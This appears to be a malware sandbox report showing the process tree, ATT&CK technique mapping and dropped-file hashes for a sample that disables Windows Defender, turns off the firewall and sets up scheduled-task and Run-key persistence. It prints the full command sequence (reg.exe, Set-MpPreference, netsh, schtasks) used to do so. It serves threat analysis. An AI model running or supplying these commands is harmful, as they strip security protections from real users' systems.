C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:5732
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5764
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5796
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5812
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5856
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5876
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5908
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5948
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:5972
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2936
-
-
C:\Users\Admin\AppData\Roaming\x69install.exe"C:\Users\Admin\AppData\Roaming\x69install.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exeC:\Users\Admin\AppData\Local\Temp\iyMbXS.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\045b1cb4.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:6040 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3240
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3620
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4336
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3512 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3884
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x69" /tr "C:\Users\Admin\AppData\Roaming\x69.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5052
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe2⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exeC:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:4940 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\07c45773.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:5444 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5604
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C14C.tmp\C14D.tmp\C14E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3564 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:2112
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1520 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:2900
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4896 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2120
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:5212
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5244
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:5268
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:5292
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5320
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5348
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5376
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5404
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5436
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:5468
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:5492
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:5516
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:5544
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:5584
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:5608
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:5636
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:5668
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:5700
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:5740
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:5772
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:5820
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f5⤵PID:5844
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5884
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5916
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f5⤵PID:5940
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:5984
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6004
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6020
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies Security services
PID:6036
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f5⤵
- Modifies security service
PID:6052
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2456 -
C:\Users\Admin\AppData\Roaming\x69install.exeC:\Users\Admin\AppData\Roaming\x69install.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3764
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3696
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4024
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:4912
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:5116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:3004
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:2840
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:4236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:1812
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2212
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:4664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:1984
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4860
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
PID:3496
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:5100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:2160
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:3624
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4968
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:1060
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:6092
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:3880
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:5052
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵PID:5212
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
4Disable or Modify System Firewall
1Disable or Modify Tools
2Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
31KB
MD5ddd5265a64cedb9fc9dce8841678d3a7
SHA1942afa202bb0aacb4c5b9b774905519d2dabfde8
SHA25663644fe64dfdb3789bfe1dd60e44792d05bf030f7a7ad72b74f828527d29d396
SHA5123888f28110294610da3d63d66b0b53a3068d2b28af3edd86726dce8863ee71583ab498aa8f31c7653d5c97c238aeb0386cf63c8b1e1c717d4e3a11b3a9c9f4e9
-
Filesize
2KB
MD5a43e653ffb5ab07940f4bdd9cc8fade4
SHA1af43d04e3427f111b22dc891c5c7ee8a10ac4123
SHA256c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe
SHA51262a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b
-
Filesize
1KB
MD5bb6a89a9355baba2918bb7c32eca1c94
SHA1976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2
SHA256192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b
SHA512efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f
-
Filesize
1B
MD568b329da9893e34099c7d8ad5cb9c940
SHA1adc83b19e793491b1c6ea0fd8b46cd9f32e592fc
SHA25601ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
SHA512be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09
-
Filesize
944B
MD54f473e15a0686d0c819ad40b5f232368
SHA1a769892ae2e8203e7d4a992a317189b56723da33
SHA25653d6c0d9a801d45fefdcec9b3ecf217fef683efc4e40ba9c72f0116ee4d20237
SHA512d9b43132432078d5496688717253e58e7caab0dcbd20fc41fa8a718d11d699e93ee198f18be4243ed34bcf8912e1377888fe72ae5b26d920e765ab523f0bdf55
-
Filesize
944B
MD50026cdd9bbc34b9de2447c0eb04c14b5
SHA1ab7713fe5fbbb23031937dd1dc7d0fa238884ad4
SHA256cf5a1c42641a83dd41fe89923591962b7ad189006342c7a67669239688f84a2d
SHA51262aab723672e2731946f4bbf6a3d92609ff94384e324f3c50e803095529baf848ce2cd37219a059ced4c3f559e598bd9b900b9dd8aa0657adca6d845127797fe
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
944B
MD5e2efbfd23e33d8d07d019bdd9ca20649
SHA168d3b285c423d311bdf8dc53354f5f4000caf386
SHA256f4386e3a103dafd6e85bebc2ad649069d168b4da8a0ded51b3ec96fa1408a828
SHA512b7a961002557ff2efb785f756c9347e250392eab3dcb5168c67e89238e85368a41d0a5bdc94bfbbc192ba427c83e982234b3cf8824b166a69973f3f9df177443
-
Filesize
944B
MD5a7cc007980e419d553568a106210549a
SHA1c03099706b75071f36c3962fcc60a22f197711e0
SHA256a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165
SHA512b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666
-
Filesize
944B
MD5fd35037a4bce53228fc0c6f658209cfc
SHA117ce97a410f34a30e577e438b6602431caf90bd9
SHA25662d002ca5023ddb8272ecc8c735590f778c1f59b2ebc6fb5448c86e0d3770089
SHA51286f318f8c09b0316c91cf814ecee6f54e9a11c99a1150cf2f8864548d97d2488ab4d8ec3d731856d212c7ca4237da7bcb30fed4e7e4a1a2aa5649863f9d44263
-
Filesize
944B
MD5dd1d0b083fedf44b482a028fb70b96e8
SHA1dc9c027937c9f6d52268a1504cbae42a39c8d36a
SHA256cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c
SHA51296bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973
-
Filesize
944B
MD59d20bed748fbb656980b0328d7b74728
SHA15fc8910c493356c0968a86452cb7952917b954b4
SHA256172fe07653a93456e66d5b90333de53e23a561cf982a1a9d96c3459339009069
SHA512eb1f0ca1042371a0d324ba520a9c4159fe91d34cf1851d829b1bf874b92f69fd08c540558d03f9a8c3286926c3c12d89ef9a70ac649c053a02f26922918054f1
-
Filesize
944B
MD5871daa0605e2bf4f8259c6ed08922818
SHA18448225f10d502ce858e9f6818945bf7994d5963
SHA256d0fe73c3319af4bb23a904483ac9af46406b0b559023809daac4ab4dba0fc3e7
SHA512f97ce6108457836d2059d9ddf7272a811a3d332275f5bcc3887b18cb1b9a9e6f4359ca808302f13ef4245d4b39ac4636bd926f869cfa7851531457cf2db595ed
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
944B
MD501fff31a70e26012f37789b179059e32
SHA1555b6f05cce7daf46920df1c01eb5c55dc62c9e6
SHA256adf65afaf1c83572f05a99bf2ede8eb7be1aab0717d5254f501d5e09ba6f587b
SHA512ac310c9bc5c1effc45e1e425972b09d1f961af216b50e1a504caa046b7f1a5f3179760e0b29591d83756ecb686d17a24770cf06fcea57e6f287ca5bbf6b6971b
-
Filesize
944B
MD59c740b7699e2363ac4ecdf496520ca35
SHA1aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9
SHA256be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61
SHA5128885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af
-
Filesize
944B
MD5de5726e94ce7b4c3b1e45e1fe21335a8
SHA10a9f73ff1d246b5f2f33529256fd0331bd3604b7
SHA256fd897c8383327380c7c5cd1478072f08a37e338962f8e050638cef66cb619dea
SHA51207a7b8748be25990dbabc854d3f9a0447b306809ee9bebe7c87a59bdde1a6cbc465c7274b53e6f04468bd2d77509459d04bc0193125fa02ad232c736131347dd
-
Filesize
948B
MD5c9b6705519e1eef08f86c4ba5f4286f3
SHA16c6b179e452ecee2673a1d4fe128f1c06f70577f
SHA2560f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705
SHA5126d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7
-
Filesize
948B
MD5c1a54dd5a1ab44cc4c4afd42f291c863
SHA1b77043ab3582680fc96192e9d333a6be0ae0f69d
